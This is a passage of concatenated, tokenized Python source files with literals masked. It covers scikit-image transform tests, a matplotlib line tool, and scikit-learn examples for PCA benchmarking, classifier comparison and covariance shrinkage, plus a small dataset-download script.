, scale ) <EOL> assert_almost_equal ( tform2 . rotation , rotation ) <EOL> assert_almost_equal ( tform2 . shear , shear ) <EOL> assert_almost_equal ( tform2 . translation , translation ) <EOL> def test_piecewise_affine ( ) : <EOL> tform = PiecewiseAffineTransform ( ) <EOL> tform . 
estimate ( SRC , DST ) <EOL> assert_almost_equal ( tform ( SRC ) , DST ) <EOL> assert_almost_equal ( tform . inverse ( DST ) , SRC ) <EOL> def test_projective_estimation ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC [ : <NUM_LIT:4> , : ] , DST [ : <NUM_LIT:4> , : ] ) <EOL> assert_almost_equal ( tform ( SRC [ : <NUM_LIT:4> , : ] ) , DST [ : <NUM_LIT:4> , : ] ) <EOL> tform2 = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> assert_almost_equal ( tform2 . inverse ( tform2 ( SRC ) ) , SRC ) <EOL> tform3 = ProjectiveTransform ( ) <EOL> tform3 . estimate ( SRC , DST ) <EOL> assert_almost_equal ( tform3 . params , tform2 . params ) <EOL> def test_projective_init ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> tform2 = ProjectiveTransform ( tform . params ) <EOL> assert_almost_equal ( tform2 . params , tform . params ) <EOL> def test_polynomial_estimation ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC , DST , order = <NUM_LIT:10> ) <EOL> assert_almost_equal ( tform ( SRC ) , DST , <NUM_LIT:6> ) <EOL> tform2 = PolynomialTransform ( ) <EOL> tform2 . estimate ( SRC , DST , order = <NUM_LIT:10> ) <EOL> assert_almost_equal ( tform2 . params , tform . params ) <EOL> def test_polynomial_init ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC , DST , order = <NUM_LIT:10> ) <EOL> tform2 = PolynomialTransform ( tform . params ) <EOL> assert_almost_equal ( tform2 . params , tform . params ) <EOL> def test_polynomial_default_order ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> tform2 = estimate_transform ( '<STR_LIT>' , SRC , DST , order = <NUM_LIT:2> ) <EOL> assert_almost_equal ( tform2 . params , tform . params ) <EOL> def test_polynomial_inverse ( ) : <EOL> assert_raises ( Exception , PolynomialTransform ( ) . 
inverse , <NUM_LIT:0> ) <EOL> def test_union ( ) : <EOL> tform1 = SimilarityTransform ( scale = <NUM_LIT:0.1> , rotation = <NUM_LIT> ) <EOL> tform2 = SimilarityTransform ( scale = <NUM_LIT:0.1> , rotation = <NUM_LIT> ) <EOL> tform3 = SimilarityTransform ( scale = <NUM_LIT:0.1> ** <NUM_LIT:2> , rotation = <NUM_LIT> + <NUM_LIT> ) <EOL> tform = tform1 + tform2 <EOL> assert_almost_equal ( tform . params , tform3 . params ) <EOL> tform1 = AffineTransform ( scale = ( <NUM_LIT:0.1> , <NUM_LIT:0.1> ) , rotation = <NUM_LIT> ) <EOL> tform2 = SimilarityTransform ( scale = <NUM_LIT:0.1> , rotation = <NUM_LIT> ) <EOL> tform3 = SimilarityTransform ( scale = <NUM_LIT:0.1> ** <NUM_LIT:2> , rotation = <NUM_LIT> + <NUM_LIT> ) <EOL> tform = tform1 + tform2 <EOL> assert_almost_equal ( tform . params , tform3 . params ) <EOL> assert tform . __class__ == ProjectiveTransform <EOL> tform = AffineTransform ( scale = ( <NUM_LIT:0.1> , <NUM_LIT:0.1> ) , rotation = <NUM_LIT> ) <EOL> assert_almost_equal ( ( tform + tform . inverse ) . params , np . eye ( <NUM_LIT:3> ) ) <EOL> def test_union_differing_types ( ) : <EOL> tform1 = SimilarityTransform ( ) <EOL> tform2 = PolynomialTransform ( ) <EOL> assert_raises ( TypeError , tform1 . __add__ , tform2 ) <EOL> def test_geometric_tform ( ) : <EOL> tform = GeometricTransform ( ) <EOL> assert_raises ( NotImplementedError , tform , <NUM_LIT:0> ) <EOL> assert_raises ( NotImplementedError , tform . inverse , <NUM_LIT:0> ) <EOL> assert_raises ( NotImplementedError , tform . __add__ , <NUM_LIT:0> ) <EOL> def test_invalid_input ( ) : <EOL> assert_raises ( ValueError , ProjectiveTransform , np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> assert_raises ( ValueError , AffineTransform , np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> assert_raises ( ValueError , SimilarityTransform , np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> assert_raises ( ValueError , AffineTransform , <EOL> matrix = np . 
zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) , scale = <NUM_LIT:1> ) <EOL> assert_raises ( ValueError , SimilarityTransform , <EOL> matrix = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) , scale = <NUM_LIT:1> ) <EOL> assert_raises ( ValueError , PolynomialTransform , np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:3> ) ) ) <EOL> def test_degenerate ( ) : <EOL> src = dst = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:2> ) ) <EOL> tform = SimilarityTransform ( ) <EOL> tform . estimate ( src , dst ) <EOL> assert np . all ( np . isnan ( tform . params ) ) <EOL> tform = AffineTransform ( ) <EOL> tform . estimate ( src , dst ) <EOL> assert np . all ( np . isnan ( tform . params ) ) <EOL> tform = ProjectiveTransform ( ) <EOL> tform . estimate ( src , dst ) <EOL> assert np . all ( np . isnan ( tform . params ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from numpy . testing import run_module_suite <EOL> run_module_suite ( ) </s>
<s> import numpy as np <EOL> from matplotlib import lines <EOL> from ... viewer . canvastools . base import CanvasToolBase , ToolHandles <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class LineTool ( CanvasToolBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , manager , on_move = None , on_release = None , on_enter = None , <EOL> maxdist = <NUM_LIT:10> , line_props = None , handle_props = None , <EOL> ** kwargs ) : <EOL> super ( LineTool , self ) . __init__ ( manager , on_move = on_move , <EOL> on_enter = on_enter , <EOL> on_release = on_release , ** kwargs ) <EOL> props = dict ( color = '<STR_LIT:r>' , linewidth = <NUM_LIT:1> , alpha = <NUM_LIT> , solid_capstyle = '<STR_LIT>' ) <EOL> props . update ( line_props if line_props is not None else { } ) <EOL> self . linewidth = props [ '<STR_LIT>' ] <EOL> self . maxdist = maxdist <EOL> self . _active_pt = None <EOL> x = ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> y = ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . _end_pts = np . transpose ( [ x , y ] ) <EOL> self . _line = lines . Line2D ( x , y , visible = False , animated = True , ** props ) <EOL> self . ax . add_line ( self . _line ) <EOL> self . _handles = ToolHandles ( self . ax , x , y , <EOL> marker_props = handle_props ) <EOL> self . _handles . set_visible ( False ) <EOL> self . artists = [ self . _line , self . _handles . artist ] <EOL> if on_enter is None : <EOL> def on_enter ( pts ) : <EOL> x , y = np . transpose ( pts ) <EOL> print ( "<STR_LIT>" % <EOL> np . sqrt ( np . diff ( x ) ** <NUM_LIT:2> + np . diff ( y ) ** <NUM_LIT:2> ) ) <EOL> self . callback_on_enter = on_enter <EOL> self . manager . add_tool ( self ) <EOL> @ property <EOL> def end_points ( self ) : <EOL> return self . _end_pts . astype ( int ) <EOL> @ end_points . setter <EOL> def end_points ( self , pts ) : <EOL> self . _end_pts = np . asarray ( pts ) <EOL> self . _line . set_data ( np . transpose ( pts ) ) <EOL> self . _handles . set_data ( np . transpose ( pts ) ) <EOL> self . _line . 
set_linewidth ( self . linewidth ) <EOL> self . set_visible ( True ) <EOL> self . redraw ( ) <EOL> def hit_test ( self , event ) : <EOL> if event . button != <NUM_LIT:1> or not self . ax . in_axes ( event ) : <EOL> return False <EOL> idx , px_dist = self . _handles . closest ( event . x , event . y ) <EOL> if px_dist < self . maxdist : <EOL> self . _active_pt = idx <EOL> return True <EOL> else : <EOL> self . _active_pt = None <EOL> return False <EOL> def on_mouse_press ( self , event ) : <EOL> self . set_visible ( True ) <EOL> if self . _active_pt is None : <EOL> self . _active_pt = <NUM_LIT:0> <EOL> x , y = event . xdata , event . ydata <EOL> self . _end_pts = np . array ( [ [ x , y ] , [ x , y ] ] ) <EOL> def on_mouse_release ( self , event ) : <EOL> if event . button != <NUM_LIT:1> : <EOL> return <EOL> self . _active_pt = None <EOL> self . callback_on_release ( self . geometry ) <EOL> self . redraw ( ) <EOL> def on_move ( self , event ) : <EOL> if event . button != <NUM_LIT:1> or self . _active_pt is None : <EOL> return <EOL> if not self . ax . in_axes ( event ) : <EOL> return <EOL> self . update ( event . xdata , event . ydata ) <EOL> self . callback_on_move ( self . geometry ) <EOL> def update ( self , x = None , y = None ) : <EOL> if x is not None : <EOL> self . _end_pts [ self . _active_pt , : ] = x , y <EOL> self . end_points = self . _end_pts <EOL> @ property <EOL> def geometry ( self ) : <EOL> return self . end_points <EOL> class ThickLineTool ( LineTool ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , manager , on_move = None , on_enter = None , on_release = None , <EOL> on_change = None , maxdist = <NUM_LIT:10> , line_props = None , handle_props = None ) : <EOL> super ( ThickLineTool , self ) . 
__init__ ( manager , <EOL> on_move = on_move , <EOL> on_enter = on_enter , <EOL> on_release = on_release , <EOL> maxdist = maxdist , <EOL> line_props = line_props , <EOL> handle_props = handle_props ) <EOL> if on_change is None : <EOL> def on_change ( * args ) : <EOL> pass <EOL> self . callback_on_change = on_change <EOL> def on_scroll ( self , event ) : <EOL> if not event . inaxes : <EOL> return <EOL> if event . button == '<STR_LIT>' : <EOL> self . _thicken_scan_line ( ) <EOL> elif event . button == '<STR_LIT>' : <EOL> self . _shrink_scan_line ( ) <EOL> def on_key_press ( self , event ) : <EOL> if event . key == '<STR_LIT:+>' : <EOL> self . _thicken_scan_line ( ) <EOL> elif event . key == '<STR_LIT:->' : <EOL> self . _shrink_scan_line ( ) <EOL> def _thicken_scan_line ( self ) : <EOL> self . linewidth += <NUM_LIT:1> <EOL> self . update ( ) <EOL> self . callback_on_change ( self . geometry ) <EOL> def _shrink_scan_line ( self ) : <EOL> if self . linewidth > <NUM_LIT:1> : <EOL> self . linewidth -= <NUM_LIT:1> <EOL> self . update ( ) <EOL> self . callback_on_change ( self . geometry ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from ... import data <EOL> from ... viewer import ImageViewer <EOL> image = data . camera ( ) <EOL> viewer = ImageViewer ( image ) <EOL> h , w = image . shape <EOL> line_tool = ThickLineTool ( viewer ) <EOL> line_tool . end_points = ( [ w / <NUM_LIT:3> , h / <NUM_LIT:2> ] , [ <NUM_LIT:2> * w / <NUM_LIT:3> , h / <NUM_LIT:2> ] ) <EOL> viewer . show ( ) </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> import scipy as sp <EOL> import matplotlib as mpl <EOL> import six <EOL> from PIL import Image <EOL> import Cython <EOL> import networkx <EOL> for m in ( np , sp , mpl , six , Image , networkx , Cython ) : <EOL> if m is Image : <EOL> version = m . VERSION <EOL> else : <EOL> version = m . __version__ <EOL> print ( m . __name__ . rjust ( <NUM_LIT:10> ) , '<STR_LIT:U+0020>' , version ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import gc <EOL> from time import time <EOL> from collections import defaultdict <EOL> import matplotlib . pyplot as plt <EOL> from sklearn . datasets import fetch_lfw_people <EOL> from sklearn . decomposition import IncrementalPCA , RandomizedPCA , PCA <EOL> def plot_results ( X , y , label ) : <EOL> plt . plot ( X , y , label = label , marker = '<STR_LIT:o>' ) <EOL> def benchmark ( estimator , data ) : <EOL> gc . collect ( ) <EOL> print ( "<STR_LIT>" % estimator ) <EOL> t0 = time ( ) <EOL> estimator . fit ( data ) <EOL> training_time = time ( ) - t0 <EOL> data_t = estimator . transform ( data ) <EOL> data_r = estimator . inverse_transform ( data_t ) <EOL> reconstruction_error = np . mean ( np . abs ( data - data_r ) ) <EOL> return { '<STR_LIT:time>' : training_time , '<STR_LIT:error>' : reconstruction_error } <EOL> def plot_feature_times ( all_times , batch_size , all_components , data ) : <EOL> plt . figure ( ) <EOL> plot_results ( all_components , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_components , all_times [ '<STR_LIT>' ] , <EOL> label = "<STR_LIT>" % batch_size ) <EOL> plot_results ( all_components , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . suptitle ( "<STR_LIT>" % data . shape ) <EOL> plt . xlabel ( "<STR_LIT>" % data . shape [ <NUM_LIT:1> ] ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> def plot_feature_errors ( all_errors , batch_size , all_components , data ) : <EOL> plt . figure ( ) <EOL> plot_results ( all_components , all_errors [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_components , all_errors [ '<STR_LIT>' ] , <EOL> label = "<STR_LIT>" % batch_size ) <EOL> plot_results ( all_components , all_errors [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . suptitle ( "<STR_LIT>" <EOL> "<STR_LIT>" % data . shape ) <EOL> plt . 
xlabel ( "<STR_LIT>" % data . shape [ <NUM_LIT:1> ] ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> def plot_batch_times ( all_times , n_features , all_batch_sizes , data ) : <EOL> plt . figure ( ) <EOL> plot_results ( all_batch_sizes , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_batch_sizes , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_batch_sizes , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . suptitle ( "<STR_LIT>" % ( <EOL> n_features , data . shape [ <NUM_LIT:0> ] , data . shape [ <NUM_LIT:1> ] ) ) <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> def plot_batch_errors ( all_errors , n_features , all_batch_sizes , data ) : <EOL> plt . figure ( ) <EOL> plot_results ( all_batch_sizes , all_errors [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_batch_sizes , all_errors [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . suptitle ( "<STR_LIT>" % ( <EOL> n_features , data . shape [ <NUM_LIT:0> ] , data . shape [ <NUM_LIT:1> ] ) ) <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> def fixed_batch_size_comparison ( data ) : <EOL> all_features = [ i . astype ( int ) for i in np . linspace ( data . shape [ <NUM_LIT:1> ] // <NUM_LIT:10> , <EOL> data . 
shape [ <NUM_LIT:1> ] , num = <NUM_LIT:5> ) ] <EOL> batch_size = <NUM_LIT:1000> <EOL> all_times = defaultdict ( list ) <EOL> all_errors = defaultdict ( list ) <EOL> for n_components in all_features : <EOL> pca = PCA ( n_components = n_components ) <EOL> rpca = RandomizedPCA ( n_components = n_components , random_state = <NUM_LIT> ) <EOL> ipca = IncrementalPCA ( n_components = n_components , batch_size = batch_size ) <EOL> results_dict = { k : benchmark ( est , data ) for k , est in [ ( '<STR_LIT>' , pca ) , <EOL> ( '<STR_LIT>' , ipca ) , <EOL> ( '<STR_LIT>' , rpca ) ] } <EOL> for k in sorted ( results_dict . keys ( ) ) : <EOL> all_times [ k ] . append ( results_dict [ k ] [ '<STR_LIT:time>' ] ) <EOL> all_errors [ k ] . append ( results_dict [ k ] [ '<STR_LIT:error>' ] ) <EOL> plot_feature_times ( all_times , batch_size , all_features , data ) <EOL> plot_feature_errors ( all_errors , batch_size , all_features , data ) <EOL> def variable_batch_size_comparison ( data ) : <EOL> batch_sizes = [ i . astype ( int ) for i in np . linspace ( data . shape [ <NUM_LIT:0> ] // <NUM_LIT:10> , <EOL> data . shape [ <NUM_LIT:0> ] , num = <NUM_LIT:10> ) ] <EOL> for n_components in [ i . astype ( int ) for i in <EOL> np . linspace ( data . shape [ <NUM_LIT:1> ] // <NUM_LIT:10> , <EOL> data . shape [ <NUM_LIT:1> ] , num = <NUM_LIT:4> ) ] : <EOL> all_times = defaultdict ( list ) <EOL> all_errors = defaultdict ( list ) <EOL> pca = PCA ( n_components = n_components ) <EOL> rpca = RandomizedPCA ( n_components = n_components , random_state = <NUM_LIT> ) <EOL> results_dict = { k : benchmark ( est , data ) for k , est in [ ( '<STR_LIT>' , pca ) , <EOL> ( '<STR_LIT>' , rpca ) ] } <EOL> all_times [ '<STR_LIT>' ] . extend ( [ results_dict [ '<STR_LIT>' ] [ '<STR_LIT:time>' ] ] * <EOL> len ( batch_sizes ) ) <EOL> all_errors [ '<STR_LIT>' ] . extend ( [ results_dict [ '<STR_LIT>' ] [ '<STR_LIT:error>' ] ] * <EOL> len ( batch_sizes ) ) <EOL> all_times [ '<STR_LIT>' ] . 
extend ( [ results_dict [ '<STR_LIT>' ] [ '<STR_LIT:time>' ] ] * <EOL> len ( batch_sizes ) ) <EOL> all_errors [ '<STR_LIT>' ] . extend ( [ results_dict [ '<STR_LIT>' ] [ '<STR_LIT:error>' ] ] * <EOL> len ( batch_sizes ) ) <EOL> for batch_size in batch_sizes : <EOL> ipca = IncrementalPCA ( n_components = n_components , <EOL> batch_size = batch_size ) <EOL> results_dict = { k : benchmark ( est , data ) for k , est in [ ( '<STR_LIT>' , <EOL> ipca ) ] } <EOL> all_times [ '<STR_LIT>' ] . append ( results_dict [ '<STR_LIT>' ] [ '<STR_LIT:time>' ] ) <EOL> all_errors [ '<STR_LIT>' ] . append ( results_dict [ '<STR_LIT>' ] [ '<STR_LIT:error>' ] ) <EOL> plot_batch_times ( all_times , n_components , batch_sizes , data ) <EOL> plot_batch_errors ( all_errors , n_components , batch_sizes , data ) <EOL> faces = fetch_lfw_people ( resize = <NUM_LIT> , min_faces_per_person = <NUM_LIT:5> ) <EOL> X = faces . data [ : <NUM_LIT> ] <EOL> n_samples , h , w = faces . images . shape <EOL> n_features = X . shape [ <NUM_LIT:1> ] <EOL> X -= X . mean ( axis = <NUM_LIT:0> ) <EOL> X /= X . std ( axis = <NUM_LIT:0> ) <EOL> fixed_batch_size_comparison ( X ) <EOL> variable_batch_size_comparison ( X ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tarfile <EOL> from contextlib import closing <EOL> try : <EOL> from urllib import urlopen <EOL> except ImportError : <EOL> from urllib . request import urlopen <EOL> URL = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ARCHIVE_NAME = URL . rsplit ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> DATA_FOLDER = "<STR_LIT>" <EOL> if not os . path . exists ( DATA_FOLDER ) : <EOL> if not os . path . exists ( ARCHIVE_NAME ) : <EOL> print ( "<STR_LIT>" % URL ) <EOL> opener = urlopen ( URL ) <EOL> with open ( ARCHIVE_NAME , '<STR_LIT:wb>' ) as archive : <EOL> archive . write ( opener . read ( ) ) <EOL> print ( "<STR_LIT>" % ARCHIVE_NAME ) <EOL> with closing ( tarfile . open ( ARCHIVE_NAME , "<STR_LIT>" ) ) as archive : <EOL> archive . extractall ( path = '<STR_LIT:.>' ) <EOL> os . remove ( ARCHIVE_NAME ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from matplotlib . colors import ListedColormap <EOL> from sklearn . model_selection import train_test_split <EOL> from sklearn . preprocessing import StandardScaler <EOL> from sklearn . datasets import make_moons , make_circles , make_classification <EOL> from sklearn . neural_network import MLPClassifier <EOL> from sklearn . neighbors import KNeighborsClassifier <EOL> from sklearn . svm import SVC <EOL> from sklearn . gaussian_process import GaussianProcessClassifier <EOL> from sklearn . gaussian_process . kernels import RBF <EOL> from sklearn . tree import DecisionTreeClassifier <EOL> from sklearn . ensemble import RandomForestClassifier , AdaBoostClassifier <EOL> from sklearn . naive_bayes import GaussianNB <EOL> from sklearn . discriminant_analysis import QuadraticDiscriminantAnalysis <EOL> h = <NUM_LIT> <EOL> names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> classifiers = [ <EOL> KNeighborsClassifier ( <NUM_LIT:3> ) , <EOL> SVC ( kernel = "<STR_LIT>" , C = <NUM_LIT> ) , <EOL> SVC ( gamma = <NUM_LIT:2> , C = <NUM_LIT:1> ) , <EOL> GaussianProcessClassifier ( <NUM_LIT:1.0> * RBF ( <NUM_LIT:1.0> ) , warm_start = True ) , <EOL> DecisionTreeClassifier ( max_depth = <NUM_LIT:5> ) , <EOL> RandomForestClassifier ( max_depth = <NUM_LIT:5> , n_estimators = <NUM_LIT:10> , max_features = <NUM_LIT:1> ) , <EOL> MLPClassifier ( alpha = <NUM_LIT:1> ) , <EOL> AdaBoostClassifier ( ) , <EOL> GaussianNB ( ) , <EOL> QuadraticDiscriminantAnalysis ( ) ] <EOL> X , y = make_classification ( n_features = <NUM_LIT:2> , n_redundant = <NUM_LIT:0> , n_informative = <NUM_LIT:2> , <EOL> random_state = <NUM_LIT:1> , n_clusters_per_class = <NUM_LIT:1> ) <EOL> rng = np . random . RandomState ( <NUM_LIT:2> ) <EOL> X += <NUM_LIT:2> * rng . uniform ( size = X . 
shape ) <EOL> linearly_separable = ( X , y ) <EOL> datasets = [ make_moons ( noise = <NUM_LIT> , random_state = <NUM_LIT:0> ) , <EOL> make_circles ( noise = <NUM_LIT> , factor = <NUM_LIT:0.5> , random_state = <NUM_LIT:1> ) , <EOL> linearly_separable <EOL> ] <EOL> figure = plt . figure ( figsize = ( <NUM_LIT> , <NUM_LIT:9> ) ) <EOL> i = <NUM_LIT:1> <EOL> for ds_cnt , ds in enumerate ( datasets ) : <EOL> X , y = ds <EOL> X = StandardScaler ( ) . fit_transform ( X ) <EOL> X_train , X_test , y_train , y_test = train_test_split ( X , y , test_size = <NUM_LIT> , random_state = <NUM_LIT> ) <EOL> x_min , x_max = X [ : , <NUM_LIT:0> ] . min ( ) - <NUM_LIT> , X [ : , <NUM_LIT:0> ] . max ( ) + <NUM_LIT> <EOL> y_min , y_max = X [ : , <NUM_LIT:1> ] . min ( ) - <NUM_LIT> , X [ : , <NUM_LIT:1> ] . max ( ) + <NUM_LIT> <EOL> xx , yy = np . meshgrid ( np . arange ( x_min , x_max , h ) , <EOL> np . arange ( y_min , y_max , h ) ) <EOL> cm = plt . cm . RdBu <EOL> cm_bright = ListedColormap ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> ax = plt . subplot ( len ( datasets ) , len ( classifiers ) + <NUM_LIT:1> , i ) <EOL> if ds_cnt == <NUM_LIT:0> : <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> ax . scatter ( X_train [ : , <NUM_LIT:0> ] , X_train [ : , <NUM_LIT:1> ] , c = y_train , cmap = cm_bright ) <EOL> ax . scatter ( X_test [ : , <NUM_LIT:0> ] , X_test [ : , <NUM_LIT:1> ] , c = y_test , cmap = cm_bright , alpha = <NUM_LIT> ) <EOL> ax . set_xlim ( xx . min ( ) , xx . max ( ) ) <EOL> ax . set_ylim ( yy . min ( ) , yy . max ( ) ) <EOL> ax . set_xticks ( ( ) ) <EOL> ax . set_yticks ( ( ) ) <EOL> i += <NUM_LIT:1> <EOL> for name , clf in zip ( names , classifiers ) : <EOL> ax = plt . subplot ( len ( datasets ) , len ( classifiers ) + <NUM_LIT:1> , i ) <EOL> clf . fit ( X_train , y_train ) <EOL> score = clf . score ( X_test , y_test ) <EOL> if hasattr ( clf , "<STR_LIT>" ) : <EOL> Z = clf . decision_function ( np . c_ [ xx . ravel ( ) , yy . ravel ( ) ] ) <EOL> else : <EOL> Z = clf . 
predict_proba ( np . c_ [ xx . ravel ( ) , yy . ravel ( ) ] ) [ : , <NUM_LIT:1> ] <EOL> Z = Z . reshape ( xx . shape ) <EOL> ax . contourf ( xx , yy , Z , cmap = cm , alpha = <NUM_LIT> ) <EOL> ax . scatter ( X_train [ : , <NUM_LIT:0> ] , X_train [ : , <NUM_LIT:1> ] , c = y_train , cmap = cm_bright ) <EOL> ax . scatter ( X_test [ : , <NUM_LIT:0> ] , X_test [ : , <NUM_LIT:1> ] , c = y_test , cmap = cm_bright , <EOL> alpha = <NUM_LIT> ) <EOL> ax . set_xlim ( xx . min ( ) , xx . max ( ) ) <EOL> ax . set_ylim ( yy . min ( ) , yy . max ( ) ) <EOL> ax . set_xticks ( ( ) ) <EOL> ax . set_yticks ( ( ) ) <EOL> if ds_cnt == <NUM_LIT:0> : <EOL> ax . set_title ( name ) <EOL> ax . text ( xx . max ( ) - <NUM_LIT> , yy . min ( ) + <NUM_LIT> , ( '<STR_LIT>' % score ) . lstrip ( '<STR_LIT:0>' ) , <EOL> size = <NUM_LIT:15> , horizontalalignment = '<STR_LIT:right>' ) <EOL> i += <NUM_LIT:1> <EOL> plt . tight_layout ( ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from scipy . linalg import toeplitz , cholesky <EOL> from sklearn . covariance import LedoitWolf , OAS <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> n_features = <NUM_LIT:100> <EOL> r = <NUM_LIT:0.1> <EOL> real_cov = toeplitz ( r ** np . arange ( n_features ) ) <EOL> coloring_matrix = cholesky ( real_cov ) <EOL> n_samples_range = np . arange ( <NUM_LIT:6> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> repeat = <NUM_LIT:100> <EOL> lw_mse = np . zeros ( ( n_samples_range . size , repeat ) ) <EOL> oa_mse = np . zeros ( ( n_samples_range . size , repeat ) ) <EOL> lw_shrinkage = np . zeros ( ( n_samples_range . size , repeat ) ) <EOL> oa_shrinkage = np . zeros ( ( n_samples_range . size , repeat ) ) <EOL> for i , n_samples in enumerate ( n_samples_range ) : <EOL> for j in range ( repeat ) : <EOL> X = np . dot ( <EOL> np . random . normal ( size = ( n_samples , n_features ) ) , coloring_matrix . T ) <EOL> lw = LedoitWolf ( store_precision = False , assume_centered = True ) <EOL> lw . fit ( X ) <EOL> lw_mse [ i , j ] = lw . error_norm ( real_cov , scaling = False ) <EOL> lw_shrinkage [ i , j ] = lw . shrinkage_ <EOL> oa = OAS ( store_precision = False , assume_centered = True ) <EOL> oa . fit ( X ) <EOL> oa_mse [ i , j ] = oa . error_norm ( real_cov , scaling = False ) <EOL> oa_shrinkage [ i , j ] = oa . shrinkage_ <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> plt . errorbar ( n_samples_range , lw_mse . mean ( <NUM_LIT:1> ) , yerr = lw_mse . std ( <NUM_LIT:1> ) , <EOL> label = '<STR_LIT>' , color = '<STR_LIT>' , lw = <NUM_LIT:2> ) <EOL> plt . errorbar ( n_samples_range , oa_mse . mean ( <NUM_LIT:1> ) , yerr = oa_mse . std ( <NUM_LIT:1> ) , <EOL> label = '<STR_LIT>' , color = '<STR_LIT>' , lw = <NUM_LIT:2> ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> plt . 
xlim ( <NUM_LIT:5> , <NUM_LIT> ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> plt . errorbar ( n_samples_range , lw_shrinkage . mean ( <NUM_LIT:1> ) , yerr = lw_shrinkage . std ( <NUM_LIT:1> ) , <EOL> label = '<STR_LIT>' , color = '<STR_LIT>' , lw = <NUM_LIT:2> ) <EOL> plt . errorbar ( n_samples_range , oa_shrinkage . mean ( <NUM_LIT:1> ) , yerr = oa_shrinkage . std ( <NUM_LIT:1> ) , <EOL> label = '<STR_LIT>' , color = '<STR_LIT>' , lw = <NUM_LIT:2> ) <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . ylim ( plt . ylim ( ) [ <NUM_LIT:0> ] , <NUM_LIT:1.> + ( plt . ylim ( ) [ <NUM_LIT:1> ] - plt . ylim ( ) [ <NUM_LIT:0> ] ) / <NUM_LIT> ) <EOL> plt . xlim ( <NUM_LIT:5> , <NUM_LIT> ) <EOL> plt . show ( ) </s>
